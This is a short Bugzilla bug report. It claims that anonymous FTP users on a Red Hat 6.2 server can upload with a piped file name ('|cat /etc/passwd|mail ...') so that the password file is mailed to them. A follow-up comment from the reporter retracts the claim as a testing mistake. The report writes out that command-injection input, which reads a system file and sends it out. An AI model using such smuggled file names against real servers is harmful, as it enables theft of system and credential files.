From Bugzilla Helper: User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) using put with special file names gives anonymous user access to ftp server system files/resources. security issue Reproducible: Always Steps to Reproduce: 1.log in via ftp from rh6.2 system to server runing rh6.2 as user ftp passwd fred 2.type put"|cat /etc/passwd|mail myname" 3. then quit. Actual Results: you get an ftp error message but the ftp server's password file is emailed to the email specified testing on my own email server with my own email address, i was emailed the system password file. Expected Results: an error message saying invalid file name I haven't built another linux machine to test it from but it seems like a high security risk. It was descovered during a security audit i was doing on our system. I have dissabled the ftp service for the moment until I know of a fix.
appologies, this bug was tested from the mail/ftp server as a guest user, and the local shell gave read acces to /etc/passwd so passwd file being emailed was that of the telnet session, not the ftp session. bug does not exist as per further testing. - please remove